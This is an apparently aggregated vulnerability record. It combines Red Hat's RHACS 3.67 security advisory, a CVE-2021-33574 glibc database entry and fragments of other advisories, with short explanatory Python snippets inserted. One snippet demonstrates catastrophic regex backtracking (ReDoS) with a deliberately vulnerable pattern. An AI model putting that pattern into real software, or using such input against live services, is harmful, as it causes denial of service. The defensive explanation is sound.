Synopsis: Moderate: ACS 3.67 security and enhancement update Advisory ID: RHSA-2021:4902-01 Product: RHACS Advisory URL: https://access.redhat.com/errata/RHSA-2021:4902 Issue date: 2021-12-01 CVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 =====================================================================
- Summary:
Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS).
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
The release of RHACS 3.67 provides the following new features, bug fixes, security patches and system changes:
- OpenShift Dedicated support: RHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on Amazon Web Services and Google Cloud Platform.
- Use OpenShift OAuth server as an identity provider: If you are using RHACS with OpenShift, you can now configure the built-in OpenShift OAuth server as an identity provider for RHACS.
- Enhancements for CI outputs: Red Hat has improved the usability of RHACS CI integrations. CI outputs now show additional detailed information about the vulnerabilities and the security policies responsible for broken builds.
- Runtime Class policy criteria: Users can now use the Runtime Class policy criteria in RHACS to define which container runtime configuration may be used to run a pod’s containers.
Security Fix(es):
- civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API (CVE-2020-27304)
- nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
- nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)
- golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet (CVE-2021-29923)
- helm: information disclosure vulnerability (CVE-2021-32690)
- golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)
- nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
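The golang net issue above (CVE-2021-29923) exists because a leading zero in an IPv4 octet is historically ambiguous: BSD inet_aton reads "010" as octal 8, while parsers that silently drop the zero read it as decimal 10, so two components handling the same string can disagree about which host it names. A small sketch of the ambiguity (Python used only for illustration):

```python
# "010" can legitimately be read two ways, which is why parsers that
# silently accept leading zeros (as Go's net package did) are dangerous:
octet = "010"

as_decimal = int(octet, 10)  # 10 -> address 10.x.x.x
as_octal = int(octet, 8)     # 8  -> address 8.x.x.x (BSD inet_aton behavior)

print(as_decimal, as_octal)  # 10 8

# Python's ipaddress module sidesteps the ambiguity by rejecting leading
# zeros outright (behavior of Python >= 3.9.5):
import ipaddress
try:
    ipaddress.ip_address("010.8.8.8")
except ValueError as err:
    print("rejected:", err)
```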
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fixes The release of RHACS 3.67 includes the following bug fixes:
- Previously, when using RHACS with the Compliance Operator integration, RHACS did not respect or populate Compliance Operator TailoredProfiles. This has been fixed.
- Previously, the Alpine Linux package manager (APK) in Image policy looked for the presence of the apk package in the image rather than the apk-tools package. This issue has been fixed.
System changes The release of RHACS 3.67 includes the following system changes:
- Scanner now identifies vulnerabilities in Ubuntu 21.10 images.
- The Port exposure method policy criteria now include route as an exposure method.
- The OpenShift: Kubeadmin Secret Accessed security policy now allows the OpenShift Compliance Operator to check for the existence of the Kubeadmin secret without creating a violation.
- The OpenShift Compliance Operator integration now supports using TailoredProfiles.
- The RHACS Jenkins plugin now provides additional security information.
- When you enable the environment variable ROX_NETWORK_ACCESS_LOG for Central, the logs contain the Request URI and X-Forwarded-For header values.
- The default uid:gid pair for the Scanner image is now 65534:65534.
- RHACS adds a new default Scope Manager role that includes minimum permissions to create and modify access scopes.
- If microdnf is part of an image or shows up in process execution, RHACS reports it as a security violation for the Red Hat Package Manager in Image or the Red Hat Package Manager Execution security policies.
- In addition to manually uploading vulnerability definitions in offline mode, you can now upload definitions in online mode.
- You can now format the output of the following roxctl CLI commands in table, CSV, or JSON format: image scan, image check, and deployment check.
- You can now use a regular expression for the deployment name while specifying policy exclusions.
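Regular-expression exclusions like the one described above can be sketched generically. The pattern list and function below are purely illustrative assumptions, not RHACS's actual configuration format:

```python
import re

# Hypothetical exclusion list: any deployment whose name fully matches one
# of these patterns is skipped by the policy.
EXCLUDE_PATTERNS = [r"debug-.*", r".*-canary"]

def is_excluded(deployment_name: str) -> bool:
    """Return True if the deployment name matches any exclusion pattern."""
    return any(re.fullmatch(p, deployment_name) for p in EXCLUDE_PATTERNS)

print(is_excluded("debug-api"))        # True
print(is_excluded("payments-canary"))  # True
print(is_excluded("payments"))         # False
```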
- Solution:
To take advantage of these new features, fixes and changes, please upgrade Red Hat Advanced Cluster Security for Kubernetes to version 3.67.
- Bugs fixed (https://bugzilla.redhat.com/):
1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe 1978144 - CVE-2021-32690 helm: information disclosure vulnerability 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function 2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability 2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) 2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API
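Several of the CVEs in the list above (CVE-2021-3749, CVE-2021-3801, CVE-2021-23343) are ReDoS flaws, where a crafted input drives a backtracking regex engine into exponential work. The pattern below is a deliberately bad textbook example, not any of the actual vulnerable expressions:

```python
import re
import time

# Classic catastrophic backtracking: nested quantifiers over the same
# character. NOT the real axios/prismjs/path-parse regexes, just an
# illustration of the failure mode those fixes address.
evil = re.compile(r"^(a+)+$")

# The trailing "b" guarantees a failed match, forcing the engine to try
# every way of splitting the "a" run between the two quantifiers (~2^n).
for n in (10, 16, 20):
    s = "a" * n + "b"
    t0 = time.perf_counter()
    assert evil.match(s) is None
    print(f"n={n}: {time.perf_counter() - t0:.4f}s")
```

Match time roughly doubles with each extra "a", which is why a single long attacker-supplied string can pin a CPU.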
- JIRA issues fixed (https://issues.jboss.org/):
RHACS-65 - Release RHACS 3.67.0
- References:
https://access.redhat.com/security/cve/CVE-2018-20673 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-27304 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3749 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-3801 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-20266 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-23343 https://access.redhat.com/security/cve/CVE-2021-23840 https://access.redhat.com/security/cve/CVE-2021-23841 https://access.redhat.com/security/cve/CVE-2021-27645 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-29923 https://access.redhat.com/security/cve/CVE-2021-32690 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-33574 https://access.redhat.com/security/cve/CVE-2021-35942 
https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-39293 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr Kjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w tKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e lq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV x4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2 e8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK qnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz vguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt G4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT PTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/ pJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN T0pPNmsPGZY= =ux5P -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Bugs fixed (https://bugzilla.redhat.com/):
1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option 1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.0"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.70.1"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "glibc",
"scope": "eq",
"trust": 1.0,
"vendor": "gnu",
"version": "2.32"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "glibc",
"scope": "eq",
"trust": 1.0,
"vendor": "gnu",
"version": "2.33"
},
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
}
],
"trust": 0.9
},
"cve": "CVE-2021-33574",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-33574",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-393646",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-33574",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33574",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202105-1666",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-393646",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-33574",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "VULMON",
"id": "CVE-2021-33574"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"description": {
"_id": null,
"data": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact. The vulnerability stems from the library\u0027s mq_notify function containing a use-after-free flaw. Bugs fixed (https://bugzilla.redhat.com/):\n\n1944888 - CVE-2021-21409 netty: Request smuggling via content-length header\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the name\nservice cache daemon (nscd) used by multiple programs on the system. \nWithout these libraries, the Linux system cannot function correctly. \n\nSecurity Fix(es):\n\n* glibc: Arbitrary read in wordexp() (CVE-2021-35942)\n\n* glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c\n(CVE-2021-27645)\n\n* glibc: mq_notify does not handle separately allocated thread attributes\n(CVE-2021-33574)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. 
\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the glibc library\nmust be restarted, or the system rebooted. Bugs fixed (https://bugzilla.redhat.com/):\n\n1871386 - glibc: Update syscall names for Linux 5.6, 5.7, and 5.8. \n1912670 - semctl SEM_STAT_ANY fails to pass the buffer specified by the caller to the kernel\n1927877 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c [rhel-8]\n1930302 - glibc: provide IPPROTO_MPTCP definition\n1932589 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c\n1935128 - glibc: Rebuild glibc after objcopy fix for bug 1928936 [rhel-8.5.0]\n1965408 - CVE-2021-33574 glibc: mq_notify does not handle separately allocated thread attributes\n1977975 - CVE-2021-35942 glibc: Arbitrary read in wordexp()\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 
8):\n\nSource:\nglibc-2.28-164.el8.src.rpm\n\naarch64:\nglibc-2.28-164.el8.aarch64.rpm\nglibc-all-langpacks-2.28-164.el8.aarch64.rpm\nglibc-common-2.28-164.el8.aarch64.rpm\nglibc-debuginfo-2.28-164.el8.aarch64.rpm\nglibc-devel-2.28-164.el8.aarch64.rpm\nglibc-headers-2.28-164.el8.aarch64.rpm\nglibc-langpack-aa-2.28-164.el8.aarch64.rpm\nglibc-langpack-af-2.28-164.el8.aarch64.rpm\nglibc-langpack-agr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ak-2.28-164.el8.aarch64.rpm\nglibc-langpack-am-2.28-164.el8.aarch64.rpm\nglibc-langpack-an-2.28-164.el8.aarch64.rpm\nglibc-langpack-anp-2.28-164.el8.aarch64.rpm\nglibc-langpack-ar-2.28-164.el8.aarch64.rpm\nglibc-langpack-as-2.28-164.el8.aarch64.rpm\nglibc-langpack-ast-2.28-164.el8.aarch64.rpm\nglibc-langpack-ayc-2.28-164.el8.aarch64.rpm\nglibc-langpack-az-2.28-164.el8.aarch64.rpm\nglibc-langpack-be-2.28-164.el8.aarch64.rpm\nglibc-langpack-bem-2.28-164.el8.aarch64.rpm\nglibc-langpack-ber-2.28-164.el8.aarch64.rpm\nglibc-langpack-bg-2.28-164.el8.aarch64.rpm\nglibc-langpack-bhb-2.28-164.el8.aarch64.rpm\nglibc-langpack-bho-2.28-164.el8.aarch64.rpm\nglibc-langpack-bi-2.28-164.el8.aarch64.rpm\nglibc-langpack-bn-2.28-164.el8.aarch64.rpm\nglibc-langpack-bo-2.28-164.el8.aarch64.rpm\nglibc-langpack-br-2.28-164.el8.aarch64.rpm\nglibc-langpack-brx-2.28-164.el8.aarch64.rpm\nglibc-langpack-bs-2.28-164.el8.aarch64.rpm\nglibc-langpack-byn-2.28-164.el8.aarch64.rpm\nglibc-langpack-ca-2.28-164.el8.aarch64.rpm\nglibc-langpack-ce-2.28-164.el8.aarch64.rpm\nglibc-langpack-chr-2.28-164.el8.aarch64.rpm\nglibc-langpack-cmn-2.28-164.el8.aarch64.rpm\nglibc-langpack-crh-2.28-164.el8.aarch64.rpm\nglibc-langpack-cs-2.28-164.el8.aarch64.rpm\nglibc-langpack-csb-2.28-164.el8.aarch64.rpm\nglibc-langpack-cv-2.28-164.el8.aarch64.rpm\nglibc-langpack-cy-2.28-164.el8.aarch64.rpm\nglibc-langpack-da-2.28-164.el8.aarch64.rpm\nglibc-langpack-de-2.28-164.el8.aarch64.rpm\nglibc-langpack-doi-2.28-164.el8.aarch64.rpm\nglibc-langpack-dsb-2.28-164.el8.aarch64.rpm\nglibc-langpack-dv-2
.28-164.el8.aarch64.rpm\nglibc-langpack-dz-2.28-164.el8.aarch64.rpm\nglibc-langpack-el-2.28-164.el8.aarch64.rpm\nglibc-langpack-en-2.28-164.el8.aarch64.rpm\nglibc-langpack-eo-2.28-164.el8.aarch64.rpm\nglibc-langpack-es-2.28-164.el8.aarch64.rpm\nglibc-langpack-et-2.28-164.el8.aarch64.rpm\nglibc-langpack-eu-2.28-164.el8.aarch64.rpm\nglibc-langpack-fa-2.28-164.el8.aarch64.rpm\nglibc-langpack-ff-2.28-164.el8.aarch64.rpm\nglibc-langpack-fi-2.28-164.el8.aarch64.rpm\nglibc-langpack-fil-2.28-164.el8.aarch64.rpm\nglibc-langpack-fo-2.28-164.el8.aarch64.rpm\nglibc-langpack-fr-2.28-164.el8.aarch64.rpm\nglibc-langpack-fur-2.28-164.el8.aarch64.rpm\nglibc-langpack-fy-2.28-164.el8.aarch64.rpm\nglibc-langpack-ga-2.28-164.el8.aarch64.rpm\nglibc-langpack-gd-2.28-164.el8.aarch64.rpm\nglibc-langpack-gez-2.28-164.el8.aarch64.rpm\nglibc-langpack-gl-2.28-164.el8.aarch64.rpm\nglibc-langpack-gu-2.28-164.el8.aarch64.rpm\nglibc-langpack-gv-2.28-164.el8.aarch64.rpm\nglibc-langpack-ha-2.28-164.el8.aarch64.rpm\nglibc-langpack-hak-2.28-164.el8.aarch64.rpm\nglibc-langpack-he-2.28-164.el8.aarch64.rpm\nglibc-langpack-hi-2.28-164.el8.aarch64.rpm\nglibc-langpack-hif-2.28-164.el8.aarch64.rpm\nglibc-langpack-hne-2.28-164.el8.aarch64.rpm\nglibc-langpack-hr-2.28-164.el8.aarch64.rpm\nglibc-langpack-hsb-2.28-164.el8.aarch64.rpm\nglibc-langpack-ht-2.28-164.el8.aarch64.rpm\nglibc-langpack-hu-2.28-164.el8.aarch64.rpm\nglibc-langpack-hy-2.28-164.el8.aarch64.rpm\nglibc-langpack-ia-2.28-164.el8.aarch64.rpm\nglibc-langpack-id-2.28-164.el8.aarch64.rpm\nglibc-langpack-ig-2.28-164.el8.aarch64.rpm\nglibc-langpack-ik-2.28-164.el8.aarch64.rpm\nglibc-langpack-is-2.28-164.el8.aarch64.rpm\nglibc-langpack-it-2.28-164.el8.aarch64.rpm\nglibc-langpack-iu-2.28-164.el8.aarch64.rpm\nglibc-langpack-ja-2.28-164.el8.aarch64.rpm\nglibc-langpack-ka-2.28-164.el8.aarch64.rpm\nglibc-langpack-kab-2.28-164.el8.aarch64.rpm\nglibc-langpack-kk-2.28-164.el8.aarch64.rpm\nglibc-langpack-kl-2.28-164.el8.aarch64.rpm\nglibc-langpack-km-2.28-164.el8.
aarch64.rpm\nglibc-langpack-kn-2.28-164.el8.aarch64.rpm\nglibc-langpack-ko-2.28-164.el8.aarch64.rpm\nglibc-langpack-kok-2.28-164.el8.aarch64.rpm\nglibc-langpack-ks-2.28-164.el8.aarch64.rpm\nglibc-langpack-ku-2.28-164.el8.aarch64.rpm\nglibc-langpack-kw-2.28-164.el8.aarch64.rpm\nglibc-langpack-ky-2.28-164.el8.aarch64.rpm\nglibc-langpack-lb-2.28-164.el8.aarch64.rpm\nglibc-langpack-lg-2.28-164.el8.aarch64.rpm\nglibc-langpack-li-2.28-164.el8.aarch64.rpm\nglibc-langpack-lij-2.28-164.el8.aarch64.rpm\nglibc-langpack-ln-2.28-164.el8.aarch64.rpm\nglibc-langpack-lo-2.28-164.el8.aarch64.rpm\nglibc-langpack-lt-2.28-164.el8.aarch64.rpm\nglibc-langpack-lv-2.28-164.el8.aarch64.rpm\nglibc-langpack-lzh-2.28-164.el8.aarch64.rpm\nglibc-langpack-mag-2.28-164.el8.aarch64.rpm\nglibc-langpack-mai-2.28-164.el8.aarch64.rpm\nglibc-langpack-mfe-2.28-164.el8.aarch64.rpm\nglibc-langpack-mg-2.28-164.el8.aarch64.rpm\nglibc-langpack-mhr-2.28-164.el8.aarch64.rpm\nglibc-langpack-mi-2.28-164.el8.aarch64.rpm\nglibc-langpack-miq-2.28-164.el8.aarch64.rpm\nglibc-langpack-mjw-2.28-164.el8.aarch64.rpm\nglibc-langpack-mk-2.28-164.el8.aarch64.rpm\nglibc-langpack-ml-2.28-164.el8.aarch64.rpm\nglibc-langpack-mn-2.28-164.el8.aarch64.rpm\nglibc-langpack-mni-2.28-164.el8.aarch64.rpm\nglibc-langpack-mr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ms-2.28-164.el8.aarch64.rpm\nglibc-langpack-mt-2.28-164.el8.aarch64.rpm\nglibc-langpack-my-2.28-164.el8.aarch64.rpm\nglibc-langpack-nan-2.28-164.el8.aarch64.rpm\nglibc-langpack-nb-2.28-164.el8.aarch64.rpm\nglibc-langpack-nds-2.28-164.el8.aarch64.rpm\nglibc-langpack-ne-2.28-164.el8.aarch64.rpm\nglibc-langpack-nhn-2.28-164.el8.aarch64.rpm\nglibc-langpack-niu-2.28-164.el8.aarch64.rpm\nglibc-langpack-nl-2.28-164.el8.aarch64.rpm\nglibc-langpack-nn-2.28-164.el8.aarch64.rpm\nglibc-langpack-nr-2.28-164.el8.aarch64.rpm\nglibc-langpack-nso-2.28-164.el8.aarch64.rpm\nglibc-langpack-oc-2.28-164.el8.aarch64.rpm\nglibc-langpack-om-2.28-164.el8.aarch64.rpm\nglibc-langpack-or-2.28-164.el8.aarch
64.rpm\nglibc-langpack-os-2.28-164.el8.aarch64.rpm\nglibc-langpack-pa-2.28-164.el8.aarch64.rpm\nglibc-langpack-pap-2.28-164.el8.aarch64.rpm\nglibc-langpack-pl-2.28-164.el8.aarch64.rpm\nglibc-langpack-ps-2.28-164.el8.aarch64.rpm\nglibc-langpack-pt-2.28-164.el8.aarch64.rpm\nglibc-langpack-quz-2.28-164.el8.aarch64.rpm\nglibc-langpack-raj-2.28-164.el8.aarch64.rpm\nglibc-langpack-ro-2.28-164.el8.aarch64.rpm\nglibc-langpack-ru-2.28-164.el8.aarch64.rpm\nglibc-langpack-rw-2.28-164.el8.aarch64.rpm\nglibc-langpack-sa-2.28-164.el8.aarch64.rpm\nglibc-langpack-sah-2.28-164.el8.aarch64.rpm\nglibc-langpack-sat-2.28-164.el8.aarch64.rpm\nglibc-langpack-sc-2.28-164.el8.aarch64.rpm\nglibc-langpack-sd-2.28-164.el8.aarch64.rpm\nglibc-langpack-se-2.28-164.el8.aarch64.rpm\nglibc-langpack-sgs-2.28-164.el8.aarch64.rpm\nglibc-langpack-shn-2.28-164.el8.aarch64.rpm\nglibc-langpack-shs-2.28-164.el8.aarch64.rpm\nglibc-langpack-si-2.28-164.el8.aarch64.rpm\nglibc-langpack-sid-2.28-164.el8.aarch64.rpm\nglibc-langpack-sk-2.28-164.el8.aarch64.rpm\nglibc-langpack-sl-2.28-164.el8.aarch64.rpm\nglibc-langpack-sm-2.28-164.el8.aarch64.rpm\nglibc-langpack-so-2.28-164.el8.aarch64.rpm\nglibc-langpack-sq-2.28-164.el8.aarch64.rpm\nglibc-langpack-sr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ss-2.28-164.el8.aarch64.rpm\nglibc-langpack-st-2.28-164.el8.aarch64.rpm\nglibc-langpack-sv-2.28-164.el8.aarch64.rpm\nglibc-langpack-sw-2.28-164.el8.aarch64.rpm\nglibc-langpack-szl-2.28-164.el8.aarch64.rpm\nglibc-langpack-ta-2.28-164.el8.aarch64.rpm\nglibc-langpack-tcy-2.28-164.el8.aarch64.rpm\nglibc-langpack-te-2.28-164.el8.aarch64.rpm\nglibc-langpack-tg-2.28-164.el8.aarch64.rpm\nglibc-langpack-th-2.28-164.el8.aarch64.rpm\nglibc-langpack-the-2.28-164.el8.aarch64.rpm\nglibc-langpack-ti-2.28-164.el8.aarch64.rpm\nglibc-langpack-tig-2.28-164.el8.aarch64.rpm\nglibc-langpack-tk-2.28-164.el8.aarch64.rpm\nglibc-langpack-tl-2.28-164.el8.aarch64.rpm\nglibc-langpack-tn-2.28-164.el8.aarch64.rpm\nglibc-langpack-to-2.28-164.el8.aarch64.rpm\
